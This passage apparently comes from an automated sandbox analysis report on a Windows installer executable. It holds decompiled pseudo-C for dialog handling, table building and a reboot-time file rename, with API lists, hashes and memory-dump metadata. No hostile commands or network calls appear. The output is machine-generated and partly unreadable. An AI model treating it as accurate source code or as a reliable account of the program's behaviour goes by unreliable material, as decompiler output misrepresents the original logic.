                                                                      						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                      						if(_t182 < 0) {
                                                                      							L64:
                                                                      							return _t168 | 0xffffffff;
                                                                      						}
                                                                      						_t190 = _t190 + 1;
                                                                      						_t181 = _t182 + _t182;
                                                                      					}
                                                                      					_t281 = _t234 << 2;
                                                                      					_t191 = _t299 + _t281 - 0x70;
                                                                      					_t269 =  *_t191;
                                                                      					_t183 = _t181 - _t269;
                                                                      					_v52 = _t183;
                                                                      					if(_t183 < 0) {
                                                                      						goto L64;
                                                                      					}
                                                                      					_v176 = _t168;
                                                                      					 *_t191 = _t269 + _t183;
                                                                      					_t192 = 0;
                                                                      					_t235 = _t234 - 1;
                                                                      					if(_t235 == 0) {
                                                                      						L21:
                                                                      						_t184 = _a4;
                                                                      						_t271 = 0;
                                                                      						do {
                                                                      							_t193 =  *_t184;
                                                                      							_t184 =  &(_t184[1]);
                                                                      							if(_t193 != _t168) {
                                                                      								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                      								_t236 =  *_t232;
                                                                      								 *((intOrPtr*)(0x42d2a0 + _t236 * 4)) = _t271;
                                                                      								 *_t232 = _t236 + 1;
                                                                      							}
                                                                      							_t271 = _t271 + 1;
                                                                      						} while (_t271 < _a8);
                                                                      						_v16 = _v16 | 0xffffffff;
                                                                      						_v40 = _v40 & 0x00000000;
                                                                      						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                      						_t195 = _v8;
                                                                      						_t186 =  ~_a28;
                                                                      						_v12 = _t168;
                                                                      						_v180 = _t168;
                                                                      						_v36 = 0x42d2a0;
                                                                      						_v240 = _t168;
                                                                      						if(_t195 > _v28) {
                                                                      							L62:
                                                                      							_t168 = 0;
                                                                      							if(_v52 == 0 || _v28 == 1) {
                                                                      								return _t168;
                                                                      							} else {
                                                                      								goto L64;
                                                                      							}
                                                                      						}
                                                                      						_v44 = _t195 - 1;
                                                                      						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                      						do {
                                                                      							_t282 =  *_v32;
                                                                      							if(_t282 == 0) {
                                                                      								goto L61;
                                                                      							}
                                                                      							while(1) {
                                                                      								_t283 = _t282 - 1;
                                                                      								_t200 = _a28 + _t186;
                                                                      								_v48 = _t283;
                                                                      								_v24 = _t200;
                                                                      								if(_v8 <= _t200) {
                                                                      									goto L45;
                                                                      								}
                                                                      								L31:
                                                                      								_v20 = _t283 + 1;
                                                                      								do {
                                                                      									_v16 = _v16 + 1;
                                                                      									_t296 = _v28 - _v24;
                                                                      									if(_t296 > _a28) {
                                                                      										_t296 = _a28;
                                                                      									}
                                                                      									_t222 = _v8 - _v24;
                                                                      									_t254 = 1 << _t222;
                                                                      									if(1 <= _v20) {
                                                                      										L40:
                                                                      										_t256 =  *_a36;
                                                                      										_t168 = 1 << _t222;
                                                                      										_v40 = 1;
                                                                      										_t274 = _t256 + 1;
                                                                      										if(_t274 > 0x5a0) {
                                                                      											goto L64;
                                                                      										}
                                                                      									} else {
                                                                      										_t275 = _v32;
                                                                      										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                      										if(_t222 >= _t296) {
                                                                      											goto L40;
                                                                      										}
                                                                      										while(1) {
                                                                      											_t222 = _t222 + 1;
                                                                      											if(_t222 >= _t296) {
                                                                      												goto L40;
                                                                      											}
                                                                      											_t275 = _t275 + 4;
                                                                      											_t264 = _t263 + _t263;
                                                                      											_t175 =  *_t275;
                                                                      											if(_t264 <= _t175) {
                                                                      												goto L40;
                                                                      											}
                                                                      											_t263 = _t264 - _t175;
                                                                      										}
                                                                      										goto L40;
                                                                      									}
                                                                      									_t168 = _a32 + _t256 * 4;
                                                                      									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                      									 *_a36 = _t274;
                                                                      									_t259 = _v16;
                                                                      									 *_t297 = _t168;
                                                                      									if(_t259 == 0) {
                                                                      										 *_a24 = _t168;
                                                                      									} else {
                                                                      										_t276 = _v12;
                                                                      										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                      										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                      										_a5 = _a28;
                                                                      										_a4 = _t222;
                                                                      										_t262 = _t276 >> _t186;
                                                                      										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                      										 *(_t298 + _t262 * 4) = _a4;
                                                                      									}
                                                                      									_t224 = _v24;
                                                                      									_t186 = _t224;
                                                                      									_t225 = _t224 + _a28;
                                                                      									_v24 = _t225;
                                                                      								} while (_v8 > _t225);
                                                                      								L45:
                                                                      								_t284 = _v36;
                                                                      								_a5 = _v8 - _t186;
                                                                      								if(_t284 < 0x42d2a0 + _a8 * 4) {
                                                                      									_t205 =  *_t284;
                                                                      									if(_t205 >= _a12) {
                                                                      										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                      										_v36 =  &(_v36[1]);
                                                                      										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                      										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                      									} else {
                                                                      										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                      										_t208 =  *_t284;
                                                                      										_v36 =  &(_t284[1]);
                                                                      									}
                                                                      									_a6 = _t208;
                                                                      								} else {
                                                                      									_a4 = 0xc0;
                                                                      								}
                                                                      								_t286 = 1 << _v8 - _t186;
                                                                      								_t244 = _v12 >> _t186;
                                                                      								while(_t244 < _v40) {
                                                                      									 *(_t168 + _t244 * 4) = _a4;
                                                                      									_t244 = _t244 + _t286;
                                                                      								}
                                                                      								_t287 = _v12;
                                                                      								_t246 = 1 << _v44;
                                                                      								while((_t287 & _t246) != 0) {
                                                                      									_t287 = _t287 ^ _t246;
                                                                      									_t246 = _t246 >> 1;
                                                                      								}
                                                                      								_t288 = _t287 ^ _t246;
                                                                      								_v20 = 1;
                                                                      								_v12 = _t288;
                                                                      								_t251 = _v16;
                                                                      								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                      									L60:
                                                                      									if(_v48 != 0) {
                                                                      										_t282 = _v48;
                                                                      										_t283 = _t282 - 1;
                                                                      										_t200 = _a28 + _t186;
                                                                      										_v48 = _t283;
                                                                      										_v24 = _t200;
                                                                      										if(_v8 <= _t200) {
                                                                      											goto L45;
                                                                      										}
                                                                      										goto L31;
                                                                      									}
                                                                      									break;
                                                                      								} else {
                                                                      									goto L58;
                                                                      								}
                                                                      								do {
                                                                      									L58:
                                                                      									_t186 = _t186 - _a28;
                                                                      									_t251 = _t251 - 1;
                                                                      								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                      								_v16 = _t251;
                                                                      								goto L60;
                                                                      							}
                                                                      							L61:
                                                                      							_v8 = _v8 + 1;
                                                                      							_v32 = _v32 + 4;
                                                                      							_v44 = _v44 + 1;
                                                                      						} while (_v8 <= _v28);
                                                                      						goto L62;
                                                                      					}
                                                                      					_t277 = 0;
                                                                      					do {
                                                                      						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                      						_t277 = _t277 + 4;
                                                                      						_t235 = _t235 - 1;
                                                                      						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                      					} while (_t235 != 0);
                                                                      					goto L21;
                                                                      				}
                                                                      				 *_a24 =  *_a24 & 0x00000000;
                                                                      				 *_a28 =  *_a28 & 0x00000000;
                                                                      				return 0;
                                                                      			}
                                                                      0x00406930
                                                                      0x00406933
                                                                      0x00406934
                                                                      0x00406934
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x004068a0
                                                                      0x004068a6
                                                                      0x00000000

Memory Dump Source
• Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
Similarity
• Opcode ID: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
• Instruction ID: 0e4a2dd50186a7358473a6e43bf553a04c5afd6639b348010b65f15c337817cd
• Opcode Fuzzy Hash: 8d4d4038b428717fbb616dadee5392a57e0a8d9c6ebddc8936aa8167a04c56aa
• Instruction Fuzzy Hash: 4EC15971A00259CBCF18DF68D4905EEB7B2FF89314F26826AD856BB380D734A951CF94
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 77%
E004038C7(struct HWND__* _a4, int _a8, int _a12, long _a16) {
	void* _v84;
	void* _v88;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t33;
	signed int _t35;
	struct HWND__* _t37;
	struct HWND__* _t47;
	struct HWND__* _t65;
	struct HWND__* _t71;
	struct HWND__* _t84;
	struct HWND__* _t89;
	struct HWND__* _t97;
	int _t101;
	int _t104;
	struct HWND__* _t117;
	struct HWND__* _t120;
	signed int _t122;
	struct HWND__* _t127;
	long _t132;
	int _t134;
	int _t135;
	struct HWND__* _t136;
	void* _t139;

	_t135 = _a8;
	if(_t135 == 0x110 || _t135 == 0x408) {
		_t33 = _a12;
		_t117 = _a4;
		__eflags = _t135 - 0x110;
		 *0x42a46c = _t33;
		if(_t135 == 0x110) {
			 *0x42f024 = _t117;
			 *0x42a480 = GetDlgItem(_t117, 1);
			_t89 = GetDlgItem(_t117, 2);
			_push(0xffffffff);
			_push(0x1c);
			 *0x429448 = _t89;
			E00403DAF(_t117);
			SetClassLongA(_t117, 0xfffffff2,  *0x42e808);
			 *0x42e7ec = E00401410(4);
			_t33 = 1;
			__eflags = 1;
			 *0x42a46c = 1;
		}
		_t120 =  *0x409274; // 0xffffffff
		_t132 = (_t120 << 6) +  *0x42f040;
		__eflags = _t120;
		if(_t120 < 0) {
			L38:
			E00403DFB(0x40b);
			while(1) {
				_t35 =  *0x42a46c;
				 *0x409274 =  *0x409274 + _t35;
				_t132 = _t132 + (_t35 << 6);
				_t37 =  *0x409274; // 0xffffffff
				__eflags = _t37 -  *0x42f044;
				if(_t37 ==  *0x42f044) {
					E00401410(1);
				}
				__eflags =  *0x42e7ec;
				if( *0x42e7ec != 0) {
					break;
				}
				__eflags =  *0x409274 -  *0x42f044; // 0xffffffff
				if(__eflags >= 0) {
					break;
				}
				_push( *((intOrPtr*)(_t132 + 0x24)));
				_t122 =  *(_t132 + 0x14);
				_push(0x437000);
				E004059C6(_t117, _t122, _t132);
				_push( *((intOrPtr*)(_t132 + 0x20)));
				_push(0xfffffc19);
				E00403DAF(_t117);
				_push( *((intOrPtr*)(_t132 + 0x1c)));
				_push(0xfffffc1b);
				E00403DAF(_t117);
				_push( *((intOrPtr*)(_t132 + 0x28)));
				_push(0xfffffc1a);
				E00403DAF(_t117);
				_t47 = GetDlgItem(_t117, 3);
				__eflags =  *0x42f0ac;
				_t136 = _t47;
				if( *0x42f0ac != 0) {
					_t122 = _t122 & 0x0000fefd | 0x00000004;
					__eflags = _t122;
				}
				ShowWindow(_t136, _t122 & 0x00000008);
				EnableWindow(_t136, _t122 & 0x00000100);
				E00403DD1(_t122 & 0x00000002);
				EnableWindow( *0x429448, _t122 & 0x00000004);
				SendMessageA(_t136, 0xf4, 0, 1);
				__eflags =  *0x42f0ac;
				if( *0x42f0ac == 0) {
					_push( *0x42a480);
				} else {
					SendMessageA(_t117, 0x401, 2, 0);
					_push( *0x429448);
				}
				E00403DE4();
				E004059A4(0x42a488, 0x42e820);
				_push( *((intOrPtr*)(_t132 + 0x18)));
				_push( &(0x42a488[lstrlenA(0x42a488)]));
				E004059C6(_t117, 0, _t132);
				SetWindowTextA(_t117, 0x42a488);
				_push(0);
				_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
				__eflags = _t65;
				if(_t65 != 0) {
					continue;
				} else {
					__eflags =  *_t132 - _t65;
					if( *_t132 == _t65) {
						continue;
					}
					__eflags =  *(_t132 + 4) - 5;
					if( *(_t132 + 4) != 5) {
						DestroyWindow( *0x42e7f8);
						 *0x429c58 = _t132;
						__eflags =  *_t132;
						if( *_t132 > 0) {
							_t71 = CreateDialogParamA( *0x42f020,  *_t132 +  *0x42e800 & 0x0000ffff, _t117,  *(0x409278 +  *(_t132 + 4) * 4), _t132);
							__eflags = _t71;
							 *0x42e7f8 = _t71;
							if(_t71 != 0) {
								_push( *((intOrPtr*)(_t132 + 0x2c)));
								_push(6);
								E00403DAF(_t71);
								GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
								ScreenToClient(_t117, _t139 + 0x10);
								SetWindowPos( *0x42e7f8, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
								_push(0);
								E0040136D( *((intOrPtr*)(_t132 + 0xc)));
								ShowWindow( *0x42e7f8, 8);
								E00403DFB(0x405);
							}
						}
						goto L58;
					}
					__eflags =  *0x42f0ac - _t65;
					if( *0x42f0ac != _t65) {
						goto L61;
					}
					__eflags =  *0x42f0a0 - _t65;
					if( *0x42f0a0 != _t65) {
						continue;
					}
					goto L61;
				}
			}
			DestroyWindow( *0x42e7f8);
			 *0x42f024 =  *0x42f024 & 0x00000000;
			__eflags =  *0x42f024;
			EndDialog(_t117,  *0x429850);
			goto L58;
		} else {
			__eflags = _t33 - 1;
			if(_t33 != 1) {
				L37:
				__eflags =  *_t132;
				if( *_t132 == 0) {
					goto L61;
				}
				goto L38;
			}
			_push(0);
			_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
			__eflags = _t84;
			if(_t84 == 0) {
				goto L37;
			}
			SendMessageA( *0x42e7f8, 0x40f, 0, 1);
			__eflags =  *0x42e7ec;
			return 0 |  *0x42e7ec == 0x00000000;
		}
	} else {
		_t117 = _a4;
		if(_t135 == 0x47) {
			SetWindowPos( *0x42a460, _t117, 0, 0, 0, 0, 0x13);
		}
		if(_t135 == 5) {
			asm("sbb eax, eax");
			ShowWindow( *0x42a460,  ~(_a12 - 1) & _t135);
		}
		if(_t135 != 0x40d) {
			__eflags = _t135 - 0x11;
			if(_t135 != 0x11) {
				__eflags = _t135 - 0x10;
				if(_t135 != 0x10) {
					L14:
					__eflags = _t135 - 0x111;
					if(_t135 != 0x111) {
						L30:
						return E00403E16(_t135, _a12, _a16);
					}
					_t134 = _a12 & 0x0000ffff;
					_t127 = GetDlgItem(_t117, _t134);
					__eflags = _t127;
					if(_t127 == 0) {
						L17:
						__eflags = _t134 - 1;
						if(_t134 != 1) {
							__eflags = _t134 - 3;
							if(_t134 != 3) {
								__eflags = _t134 - 2;
								if(_t134 != 2) {
									L29:
									SendMessageA( *0x42e7f8, 0x111, _a12, _a16);
									goto L30;
								}
								__eflags =  *0x42f0ac;
								if( *0x42f0ac == 0) {
									_t97 = E00401410(3);
									__eflags = _t97;
									if(_t97 != 0) {
										goto L30;
									}
									 *0x429850 = 1;
									L25:
									_push(0x78);
									L26:
									E00403D88();
									goto L30;
								}
								E00401410(_t134);
								 *0x429850 = _t134;
								goto L25;
							}
							__eflags =  *0x409274;
							if( *0x409274 <= 0) {
								goto L29;
							}
							_push(0xffffffff);
							goto L26;
						}
						_push(1);
						goto L26;
					}
					SendMessageA(_t127, 0xf3, 0, 0);
					_t101 = IsWindowEnabled(_t127);
					__eflags = _t101;
					if(_t101 == 0) {
						goto L61;
					}
					goto L17;
				}
				__eflags =  *0x409274 -  *0x42f044 - 1; // 0xffffffff
				if(__eflags != 0) {
					goto L30;
				}
				_t104 = IsWindowEnabled( *0x429448);
				__eflags = _t104;
				if(_t104 != 0) {
					goto L30;
				}
				_t135 = 0x111;
				_a12 = 1;
				goto L14;
			}
			SetWindowLongA(_t117, 0, 0);
			return 1;
		} else {
			DestroyWindow( *0x42e7f8);
			 *0x42e7f8 = _a12;
			L58:
			if( *0x42b488 == 0 &&  *0x42e7f8 != 0) {
				ShowWindow(_t117, 0xa);
				 *0x42b488 = 1;
			}
			L61:
			return 0;
		}
	}
}

                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403903
                                                                      • ShowWindow.USER32(?), ref: 00403920
                                                                      • DestroyWindow.USER32 ref: 00403934
                                                                      • SetWindowLongA.USER32 ref: 00403952
                                                                      • IsWindowEnabled.USER32 ref: 0040397D
                                                                      • GetDlgItem.USER32 ref: 004039AB
                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039C7
                                                                      • IsWindowEnabled.USER32(00000000), ref: 004039CA
                                                                      • GetDlgItem.USER32 ref: 00403A72
                                                                      • GetDlgItem.USER32 ref: 00403A7C
                                                                      • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A96
                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AE7
                                                                      • GetDlgItem.USER32 ref: 00403B8E
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403BAE
                                                                      • EnableWindow.USER32(00000000,?), ref: 00403BBD
                                                                      • EnableWindow.USER32(?,?), ref: 00403BD8
                                                                      • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BEF
                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C02
                                                                      • lstrlenA.KERNEL32(0042A488,?,0042A488,0042E820), ref: 00403C2B
                                                                      • SetWindowTextA.USER32(?,0042A488), ref: 00403C3A
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403D6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3950083612-0
                                                                      • Opcode ID: 428ff54097934a11192cdc70c6de24aff26a8f42227571d0b05b4d1f68c54d3d
                                                                      • Instruction ID: df67f1e6a98feb1900587c3b6fb9bf12febe36b0bbe5eaa1fdfdb9a2e9e00487
                                                                      • Opcode Fuzzy Hash: 428ff54097934a11192cdc70c6de24aff26a8f42227571d0b05b4d1f68c54d3d
                                                                      • Instruction Fuzzy Hash: 9FC18071604200AFEB306F21ED45F273AADFB44706F50053AF651B62F2D6799942DB2D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E00403EF7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                      				char* _v8;
                                                                      				signed int _v12;
                                                                      				void* _v16;
                                                                      				struct HWND__* _t52;
                                                                      				long _t86;
                                                                      				int _t98;
                                                                      				struct HWND__* _t99;
                                                                      				signed int _t100;
                                                                      				intOrPtr _t109;
                                                                      				int _t110;
                                                                      				signed int* _t112;
                                                                      				signed int _t113;
                                                                      				char* _t114;
                                                                      				CHAR* _t115;
                                                                      
                                                                      				if(_a8 != 0x110) {
                                                                      					if(_a8 != 0x111) {
                                                                      						L11:
                                                                      						if(_a8 != 0x4e) {
                                                                      							if(_a8 == 0x40b) {
                                                                      								 *0x42a468 =  *0x42a468 + 1;
                                                                      							}
                                                                      							L25:
                                                                      							_t110 = _a16;
                                                                      							L26:
                                                                      							return E00403E16(_a8, _a12, _t110);
                                                                      						}
                                                                      						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                      						_t110 = _a16;
                                                                      						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                      							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                      							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                      							_v12 = _t100;
                                                                      							_v16 = _t109;
                                                                      							_v8 = 0x42dfc0;
                                                                      							if(_t100 - _t109 < 0x800) {
                                                                      								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                      								SetCursor(LoadCursorA(0, 0x7f02));
                                                                      								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                      								SetCursor(LoadCursorA(0, 0x7f00));
                                                                      								_t110 = _a16;
                                                                      							}
                                                                      						}
                                                                      						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                      							goto L26;
                                                                      						} else {
                                                                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                      								SendMessageA( *0x42f024, 0x111, 1, 0);
                                                                      							}
                                                                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                      								SendMessageA( *0x42f024, 0x10, 0, 0);
                                                                      							}
                                                                      							return 1;
                                                                      						}
                                                                      					}
                                                                      					if(_a12 >> 0x10 != 0 ||  *0x42a468 != 0) {
                                                                      						goto L25;
                                                                      					} else {
                                                                      						_t112 =  *0x429c58 + 0x14;
                                                                      						if(( *_t112 & 0x00000020) == 0) {
                                                                      							goto L25;
                                                                      						}
                                                                      						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                      						E00403DD1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                      						E00404182();
                                                                      						goto L11;
                                                                      					}
                                                                      				}
                                                                      				_t98 = _a16;
                                                                      				_t113 =  *(_t98 + 0x30);
                                                                      				if(_t113 < 0) {
                                                                      					_t113 =  *( *0x42e7fc - 4 + _t113 * 4);
                                                                      				}
                                                                      				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                      				_t114 = _t113 +  *0x42f058;
                                                                      				_push(0x22);
                                                                      				_a16 =  *_t114;
                                                                      				_v12 = _v12 & 0x00000000;
                                                                      				_t115 = _t114 + 1;
                                                                      				_v16 = _t115;
                                                                      				_v8 = E00403EC3;
                                                                      				E00403DAF(_a4);
                                                                      				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                      				_push(0x23);
                                                                      				E00403DAF(_a4);
                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                      				E00403DD1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                      				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                      				E00403DE4(_t99);
                                                                      				SendMessageA(_t99, 0x45b, 1, 0);
                                                                      				_t86 =  *( *0x42f028 + 0x68);
                                                                      				if(_t86 < 0) {
                                                                      					_t86 = GetSysColor( ~_t86);
                                                                      				}
                                                                      				SendMessageA(_t99, 0x443, 0, _t86);
                                                                      				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                      				 *0x42944c =  *0x42944c & 0x00000000;
                                                                      				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                      				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                      				 *0x42a468 =  *0x42a468 & 0x00000000;
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • CheckDlgButton.USER32 ref: 00403F82
                                                                      • GetDlgItem.USER32 ref: 00403F96
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FB4
                                                                      • GetSysColor.USER32(?), ref: 00403FC5
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FD4
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FE3
                                                                      • lstrlenA.KERNEL32(?), ref: 00403FED
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FFB
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040400A
                                                                      • GetDlgItem.USER32 ref: 0040406D
                                                                      • SendMessageA.USER32(00000000), ref: 00404070
                                                                      • GetDlgItem.USER32 ref: 0040409B
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040DB
                                                                      • LoadCursorA.USER32 ref: 004040EA
                                                                      • SetCursor.USER32(00000000), ref: 004040F3
                                                                      • ShellExecuteA.SHELL32(0000070B,open,0042DFC0,00000000,00000000,00000001), ref: 00404106
                                                                      • LoadCursorA.USER32 ref: 00404113
                                                                      • SetCursor.USER32(00000000), ref: 00404116
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404142
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404156
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: N$open
                                                                      • API String ID: 3615053054-904208323
                                                                      • Opcode ID: 216c02f9549e4cc4fd37bee44d43603ffeb44581a3f740d349d9af80225083aa
                                                                      • Instruction ID: 14551bf79dc9b850c1df5b1ed0c744b43dbef919fb8aabdd5cdf0645a4de93b1
                                                                      • Opcode Fuzzy Hash: 216c02f9549e4cc4fd37bee44d43603ffeb44581a3f740d349d9af80225083aa
                                                                      • Instruction Fuzzy Hash: 8D61AFB1A40209BBEB109F60DC45F6A3B69EB54715F108036FB01BA2D1C7B8A991CF99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E004056F7() {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr* _t15;
                                                                      				long _t16;
                                                                      				int _t20;
                                                                      				void* _t28;
                                                                      				long _t29;
                                                                      				intOrPtr* _t37;
                                                                      				int _t43;
                                                                      				void* _t44;
                                                                      				long _t47;
                                                                      				CHAR* _t49;
                                                                      				void* _t51;
                                                                      				void* _t53;
                                                                      				intOrPtr* _t54;
                                                                      				void* _t55;
                                                                      				void* _t56;
                                                                      
                                                                      				_t15 = E00405CAA("KERNEL32.dll", "MoveFileExA");
                                                                      				_t49 =  *(_t55 + 0x18);
                                                                      				if(_t15 != 0) {
                                                                      					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                      					if(_t20 != 0) {
                                                                      						L16:
                                                                      						 *0x42f0b0 =  *0x42f0b0 + 1;
                                                                      						return _t20;
                                                                      					}
                                                                      				}
                                                                      				 *0x42c618 = 0x4c554e;
                                                                      				if(_t49 == 0) {
                                                                      					L5:
                                                                      					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42c090, 0x400);
                                                                      					if(_t16 != 0 && _t16 <= 0x400) {
                                                                      						_t43 = wsprintfA(0x42bc90, "%s=%s\r\n", 0x42c618, 0x42c090);
                                                                      						_t56 = _t55 + 0x10;
                                                                      						_push( *((intOrPtr*)( *0x42f028 + 0x128)));
                                                                      						_push(0x42c090);
                                                                      						E004059C6(_t43, 0x400, 0x42c090);
                                                                      						_t20 = E00405680(0x42c090, 0xc0000000, 4);
                                                                      						_t53 = _t20;
                                                                      						 *(_t56 + 0x14) = _t53;
                                                                      						if(_t53 == 0xffffffff) {
                                                                      							goto L16;
                                                                      						}
                                                                      						_t47 = GetFileSize(_t53, 0);
                                                                      						_t7 = _t43 + 0xa; // 0xa
                                                                      						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                      						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                      							L15:
                                                                      							_t20 = CloseHandle(_t53);
                                                                      							goto L16;
                                                                      						} else {
                                                                      							if(E004055F5(_t51, "[Rename]\r\n") != 0) {
                                                                      								_t28 = E004055F5(_t26 + 0xa, "\n[");
                                                                      								if(_t28 == 0) {
                                                                      									L13:
                                                                      									_t29 = _t47;
                                                                      									L14:
                                                                      									E00405641(_t51 + _t29, 0x42bc90, _t43);
                                                                      									SetFilePointer(_t53, 0, 0, 0);
                                                                      									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                      									GlobalFree(_t51);
                                                                      									goto L15;
                                                                      								}
                                                                      								_t37 = _t28 + 1;
                                                                      								_t44 = _t51 + _t47;
                                                                      								_t54 = _t37;
                                                                      								if(_t37 >= _t44) {
                                                                      									L21:
                                                                      									_t53 =  *(_t56 + 0x14);
                                                                      									_t29 = _t37 - _t51;
                                                                      									goto L14;
                                                                      								} else {
